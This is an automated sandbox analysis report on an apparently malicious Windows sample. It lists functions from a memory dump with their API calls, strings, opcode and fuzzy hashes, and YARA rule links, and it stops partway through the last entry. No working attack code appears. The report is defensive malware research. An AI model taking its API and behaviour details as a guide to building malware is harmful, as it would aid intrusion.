                                                                                                                                                        • Instruction ID: 5f37e0bc0e33191736bb1eab4e31203571527952cf3c2a054520dd8448af09a0
                                                                                                                                                        • Opcode Fuzzy Hash: bd4b4b26a3524fd9cec7b945f2c3bcce7ac64fd8819b3e1191436a365f1de495
                                                                                                                                                        • Instruction Fuzzy Hash: 4731B272D01609EFDF05DFA8E8455DEBBB6FF88310F14822BE811E3260EB755A058B95
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00415318, Relevance: 6.1, APIs: 4, Instructions: 85COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Value
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                        • Opcode ID: d60be5514f9b2104be0c091bd552e6071e00c1dcb3ceb957f20bc60efcd10522
                                                                                                                                                        • Instruction ID: 9bc5851d8e52caf50e524652429ca76b801a20431ce103fae1462ab359919e6c
                                                                                                                                                        • Opcode Fuzzy Hash: d60be5514f9b2104be0c091bd552e6071e00c1dcb3ceb957f20bc60efcd10522
                                                                                                                                                        • Instruction Fuzzy Hash: AA31D4B2C01214DFCB14DFA8D949ADEBBF8EF81350F04826BE41597251E3749E04DB55
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00416FC2, Relevance: 6.1, APIs: 4, Instructions: 67networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • htons.WS2_32(?), ref: 00416FFA
                                                                                                                                                          • Part of subcall function 00416F1E: __EH_prolog.LIBCMT ref: 00416F23
                                                                                                                                                        • htonl.WS2_32(00000000), ref: 00417011
                                                                                                                                                        • htonl.WS2_32(00000000), ref: 00417018
                                                                                                                                                        • htons.WS2_32(?), ref: 0041702C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: htonlhtons$H_prolog
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 984249084-0
                                                                                                                                                        • Opcode ID: a6dc7d910d3decb1230d67848ea6694069aa25f631c2d9eba95f8cb4ac58f8a7
                                                                                                                                                        • Instruction ID: e9c69d5b7660021c2f1a433658ea72789310fdb760e50641e223755316ec5930
                                                                                                                                                        • Opcode Fuzzy Hash: a6dc7d910d3decb1230d67848ea6694069aa25f631c2d9eba95f8cb4ac58f8a7
                                                                                                                                                        • Instruction Fuzzy Hash: 9A219076910208EFCB209FA4E805F9AB7FAFF08710F00852FF916D7650EB38A5458B95
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004108FA, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004108FF
                                                                                                                                                        • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 00410939
                                                                                                                                                        • RtlEnterCriticalSection.NTDLL ref: 0041094A
                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL ref: 0041097A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$CompletionEnterH_prologLeavePostQueuedStatus
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3890610498-0
                                                                                                                                                        • Opcode ID: 5dcc81ec11878ef5ea5423c18a9a6b27dba59cdc914f6761df54571c70423793
                                                                                                                                                        • Instruction ID: 542d04b902d24d2433fc51186b0d87aa9f2f1f98f500a02bb48181c6d9bfc5da
                                                                                                                                                        • Opcode Fuzzy Hash: 5dcc81ec11878ef5ea5423c18a9a6b27dba59cdc914f6761df54571c70423793
                                                                                                                                                        • Instruction Fuzzy Hash: 2911D0B1901215ABEB14DF14C965BEFBBB8EF05315F10406EE402AB351C7B89981CBE5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004141A9, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004141AE
                                                                                                                                                        • __Cnd_init.LIBCPMT ref: 004141C5
                                                                                                                                                        • __Mtx_init.LIBCPMT ref: 004141EA
                                                                                                                                                        • std::_Cnd_initX.LIBCPMT ref: 0041420E
                                                                                                                                                          • Part of subcall function 0057A79A: std::_Throw_Cpp_error.LIBCPMT ref: 0057A7C1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Cnd_initstd::_$Cpp_errorH_prologMtx_initThrow_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3198263272-0
                                                                                                                                                        • Opcode ID: 4dd36e0ce10ecfbc1864b669625fe4ccab23ddd23f16d4b04b4567666153a1a6
                                                                                                                                                        • Instruction ID: bfa92cbf377f6f33c9cfccefa7432eddd18fb94d2d3d3add7adb4cf2bbdfe368
                                                                                                                                                        • Opcode Fuzzy Hash: 4dd36e0ce10ecfbc1864b669625fe4ccab23ddd23f16d4b04b4567666153a1a6
                                                                                                                                                        • Instruction Fuzzy Hash: 151148729013469ACB15EBBCA4456DEBFF4FF85310F20445EF058A3281C7745B84C7A5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00424460, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00424465
                                                                                                                                                        • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 00424499
                                                                                                                                                        • RtlEnterCriticalSection.NTDLL ref: 004244AA
                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL ref: 004244CD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$CompletionEnterH_prologLeavePostQueuedStatus
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3890610498-0
                                                                                                                                                        • Opcode ID: d8e5f773b3efdadf516fd74d24b27c6ed00ff560ec8ffea63c344a3effc1bb97
                                                                                                                                                        • Instruction ID: 258c393ff98f001144a60ec241e762319f9d96fc056c5d9b2cd83db4fdbe96c2
                                                                                                                                                        • Opcode Fuzzy Hash: d8e5f773b3efdadf516fd74d24b27c6ed00ff560ec8ffea63c344a3effc1bb97
                                                                                                                                                        • Instruction Fuzzy Hash: 7D11A971A0160AAFC700DF69C840A9AFBB8FF15321F00412AE505E3650C3709A14CBD0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004244E6, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004244EB
                                                                                                                                                        • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 0042451D
                                                                                                                                                        • RtlEnterCriticalSection.NTDLL ref: 0042452E
                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL ref: 00424551
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$CompletionEnterH_prologLeavePostQueuedStatus
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3890610498-0
                                                                                                                                                        • Opcode ID: 168b0baaeab592286370e505fd6ff00d40b2bb081cb263b65188e4bf7c72351e
                                                                                                                                                        • Instruction ID: 014d8d6f37be94fd5c1720e5a6a693d4c815af0b196922f00c1805542592c294
                                                                                                                                                        • Opcode Fuzzy Hash: 168b0baaeab592286370e505fd6ff00d40b2bb081cb263b65188e4bf7c72351e
                                                                                                                                                        • Instruction Fuzzy Hash: 6611E17190160AEFC710CF69C840BAEFBB8FF55321F10422AE50497650C330AA14CFD0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004243E6, Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004243EB
                                                                                                                                                        • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 00424414
                                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00424425
                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00424447
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$CompletionEnterH_prologLeavePostQueuedStatus
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3890610498-0
                                                                                                                                                        • Opcode ID: fe73be1346f93151a78e6b96b23f3434234ea2ae8ccebfff9a3a04253d8f79af
                                                                                                                                                        • Instruction ID: 6cfde56f82e4d9355079032deae8de66d10285b3677ee61e91db1c4128d960b6
                                                                                                                                                        • Opcode Fuzzy Hash: fe73be1346f93151a78e6b96b23f3434234ea2ae8ccebfff9a3a04253d8f79af
                                                                                                                                                        • Instruction Fuzzy Hash: BB010C72601A11AFCB05DF64ED84BDABBB9FF04315F40422EE10197550DB306A01CAE1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041534E, Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00415353
                                                                                                                                                        • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,?), ref: 0041536F
                                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00415381
                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 004153A3
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$CompletionEnterH_prologLeavePostQueuedStatus
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3890610498-0
                                                                                                                                                        • Opcode ID: cec609706b0e7a641b05d9bd2dcf178de368b5681dff813f2c4e9ecdaf95a1cb
                                                                                                                                                        • Instruction ID: 4991fe7f96179a486d843fdadd927c50cb5cd626c9f4cf1cf29df308feaa9662
                                                                                                                                                        • Opcode Fuzzy Hash: cec609706b0e7a641b05d9bd2dcf178de368b5681dff813f2c4e9ecdaf95a1cb
                                                                                                                                                        • Instruction Fuzzy Hash: 2B01B872A01A09FFD700DF68DD40BEABBB8FF04355F00012AF10696590CB709A10CBE0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 006A2229, Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • TlsSetValue.KERNEL32(?,?), ref: 006A226B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Value
                                                                                                                                                        • String ID: )K7~$0A$FlsSetValue
                                                                                                                                                        • API String ID: 3702945584-2945187097
                                                                                                                                                        • Opcode ID: e90d34194e8e2d7680b10da2047aedb9c353dee194162d38e1a71c7ec18a876a
                                                                                                                                                        • Instruction ID: a6d90d65a3c252e528c6c06f4764633d633776f81d4dc4081db9150a788b7010
                                                                                                                                                        • Opcode Fuzzy Hash: e90d34194e8e2d7680b10da2047aedb9c353dee194162d38e1a71c7ec18a876a
                                                                                                                                                        • Instruction Fuzzy Hash: BBF02771E82208B78700BB949C06EBE7B67EB16B50F51015AFC055B280E9714E118BC4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 006A21D3, Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 30COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Value
                                                                                                                                                        • String ID: )K7~$0A$FlsGetValue
                                                                                                                                                        • API String ID: 3702945584-1467663048
                                                                                                                                                        • Opcode ID: ae2c01f594881c25e8753e0ba08f908565e8e763f35fb2b564439ac574d208c0
                                                                                                                                                        • Instruction ID: 89d78badcaabac00f621f046480f0eafe4de72db070f3b7baf0edeb8d0de8629
                                                                                                                                                        • Opcode Fuzzy Hash: ae2c01f594881c25e8753e0ba08f908565e8e763f35fb2b564439ac574d208c0
                                                                                                                                                        • Instruction Fuzzy Hash: AFE0A370F82214778710BB589C06EBE7B57DB56B10B41015EFC014B380DD750F008BD5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005C5E20, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 380COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 005C5F7C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Exception@8Throw
                                                                                                                                                        • String ID: )K7~$boost::filesystem::canonical
                                                                                                                                                        • API String ID: 2005118841-1291933195
                                                                                                                                                        • Opcode ID: 3ebd669435dd6c51c709e8f90dfeb9012980b30f4c2e45d2303dadfa98c294e0
                                                                                                                                                        • Instruction ID: 23f544c27230c180f87a67b516045c328cc69de36a1e11757ff05c3c29809b23
                                                                                                                                                        • Opcode Fuzzy Hash: 3ebd669435dd6c51c709e8f90dfeb9012980b30f4c2e45d2303dadfa98c294e0
                                                                                                                                                        • Instruction Fuzzy Hash: E3D13D719005199ECB14EBE0DC96FEDBB78BF55304F4445AEE40AA3242FF356A89CB60
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004A8F3E, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 222COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • std::_Deallocate.LIBCONCRT ref: 004A9141
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Deallocatestd::_
                                                                                                                                                        • String ID: )K7~$)K7~
                                                                                                                                                        • API String ID: 1323251999-1380908766
                                                                                                                                                        • Opcode ID: 034910ad4a7cc39e7c51ea8f9402eb9ee78b04a9dac2209b3c038162e81617e2
                                                                                                                                                        • Instruction ID: 691560e87a5a618e264924336acb16957418882a89d2eeac5fba4755b63fdd40
                                                                                                                                                        • Opcode Fuzzy Hash: 034910ad4a7cc39e7c51ea8f9402eb9ee78b04a9dac2209b3c038162e81617e2
                                                                                                                                                        • Instruction Fuzzy Hash: 3DA1E7746042869FD715CF19C084B65FBE2AB66328F28C49EE4894F352C77AEC82CB55
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005C8270, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 207COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • new.LIBCMT ref: 005C82F2
                                                                                                                                                          • Part of subcall function 0042662F: __EH_prolog.LIBCMT ref: 00426634
                                                                                                                                                          • Part of subcall function 005C7F30: FindFirstFileW.KERNEL32(00000000,00000000,00730BA8,00000000,7E374B29,?,005C72C7,00000000,?,?,?,?,?,?,006D2243,000000FF), ref: 005C801E
                                                                                                                                                          • Part of subcall function 005C7F30: GetLastError.KERNEL32(?,?,?,?,?,?,006D2243,000000FF), ref: 005C8034
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorFileFindFirstH_prologLast
                                                                                                                                                        • String ID: )K7~$boost::filesystem::directory_iterator::construct
                                                                                                                                                        • API String ID: 3940181294-2624369441
                                                                                                                                                        • Opcode ID: 7038755d538ced04fab19aac7b582446d8b70462afc7c92d95aa37b4a36c23c7
                                                                                                                                                        • Instruction ID: fa699781f3b1b8fb6a8d67a7f37ef91ef382b3f4562df9802e556dc639f103fc
                                                                                                                                                        • Opcode Fuzzy Hash: 7038755d538ced04fab19aac7b582446d8b70462afc7c92d95aa37b4a36c23c7
                                                                                                                                                        • Instruction Fuzzy Hash: 57719F71D002499ECF14EBE5DC5AFEEBB78BF54704F50456EE406A7282EF346A08CA61
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0044BA64, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 188COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0044BA69
                                                                                                                                                          • Part of subcall function 004A5476: std::_Deallocate.LIBCONCRT ref: 004A54A6
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DeallocateH_prologstd::_
                                                                                                                                                        • String ID: +$d
                                                                                                                                                        • API String ID: 3881773970-1886270708
                                                                                                                                                        • Opcode ID: 2799201c8774951d42458acc36f28a89e8578c0ea11be9a4963d4fd530d9a645
                                                                                                                                                        • Instruction ID: 578d6675532e4f92202541763eb35b178e03138ce80bcea2c8934d082e7561e5
                                                                                                                                                        • Opcode Fuzzy Hash: 2799201c8774951d42458acc36f28a89e8578c0ea11be9a4963d4fd530d9a645
                                                                                                                                                        • Instruction Fuzzy Hash: C471C471C0528CEAEB10DBA9D9857DDBFB8EF25304F1481AEE041A7281DB745B48CBA5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004110C2, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 167COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: ,+x$,+x
                                                                                                                                                        • API String ID: 3519838083-118575591
                                                                                                                                                        • Opcode ID: 39536ee760fc96ff96806163c97ac315311a152629637df8a9b02ea7ec1fe47c
                                                                                                                                                        • Instruction ID: b30bc9cd781989f7fce7883262065f16ae0ac4ac1d1b1ddebbf2259d506cabdd
                                                                                                                                                        • Opcode Fuzzy Hash: 39536ee760fc96ff96806163c97ac315311a152629637df8a9b02ea7ec1fe47c
                                                                                                                                                        • Instruction Fuzzy Hash: D1618FB0E052999FDB05CFA988906EDFFB1FB19300F1441AED941E7352C3745A86CBA5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005C8540, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 005C866F
                                                                                                                                                        Strings
                                                                                                                                                        • )K7~, xrefs: 005C8559
                                                                                                                                                        • boost::filesystem::directory_iterator::operator++, xrefs: 005C8634
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Exception@8Throw
                                                                                                                                                        • String ID: )K7~$boost::filesystem::directory_iterator::operator++
                                                                                                                                                        • API String ID: 2005118841-1663781187
                                                                                                                                                        • Opcode ID: 896d6368cd06d1c152ed4d3a45a83aeace7542ce582568e816c9df4f15563cf5
                                                                                                                                                        • Instruction ID: 87239c72227c87073afc7dc6425e8d9c3a7ad9da2d5217de547e499d6ce3268c
                                                                                                                                                        • Opcode Fuzzy Hash: 896d6368cd06d1c152ed4d3a45a83aeace7542ce582568e816c9df4f15563cf5
                                                                                                                                                        • Instruction Fuzzy Hash: B5516D71900209DECB14EFE4C956EED7BB8FF54314F40816EF80667291EB78AA48CB65
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005C75E0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetFileAttributesW.KERNEL32(00000000,7E374B29), ref: 005C761C
                                                                                                                                                          • Part of subcall function 005C6EA0: GetLastError.KERNEL32(7E374B29,?,?,?), ref: 005C6ED7
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AttributesErrorFileLast
                                                                                                                                                        • String ID: )K7~
                                                                                                                                                        • API String ID: 1799206407-2802557318
                                                                                                                                                        • Opcode ID: 7786d672ea8d9b439f4f639a134d92d56b2d77290261e3c1ba7a27fa27971b2d
                                                                                                                                                        • Instruction ID: a16095413d4e24dde6239355d4d1fb5e5c623e9c2cf966a0bf393b5460882c4f
                                                                                                                                                        • Opcode Fuzzy Hash: 7786d672ea8d9b439f4f639a134d92d56b2d77290261e3c1ba7a27fa27971b2d
                                                                                                                                                        • Instruction Fuzzy Hash: 0E41BE74E00208AFDB10EBE4DC4AFAEBBB8FF45714F40051EF816A7681EA346A018B51
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0069C74C, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free
                                                                                                                                                        • String ID: )K7~$0A
                                                                                                                                                        • API String ID: 269201875-1787144793
                                                                                                                                                        • Opcode ID: 95c8228c24dc7ada1de430ed1052f2c0ae843d039d7921459348d2175c5c788d
                                                                                                                                                        • Instruction ID: 5e676193d9fb6cff9e30a0acfe9c926544f8ffa4a396037171c55f0401eb8d62
                                                                                                                                                        • Opcode Fuzzy Hash: 95c8228c24dc7ada1de430ed1052f2c0ae843d039d7921459348d2175c5c788d
                                                                                                                                                        • Instruction Fuzzy Hash: A0416075A107148FCB18CF69D8849ADBBF6EF8D330B2581AAE515DB7A0D7709C41CB80
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005C8120, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000000,7E374B29,?,?,00000000), ref: 005C8172
                                                                                                                                                        • GetLastError.KERNEL32 ref: 005C817C
                                                                                                                                                          • Part of subcall function 005C7ED0: FindClose.KERNEL32(?,7E374B29,?,?,006D21F0,000000FF,?,00426758,?,?), ref: 005C7EFD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Find$CloseErrorFileLastNext
                                                                                                                                                        • String ID: )K7~
                                                                                                                                                        • API String ID: 256431386-2802557318
                                                                                                                                                        • Opcode ID: a5a4fd58c38c50cd9b0ed4a8c0d837c6f16f8cfc27926df6d633965bf062e73d
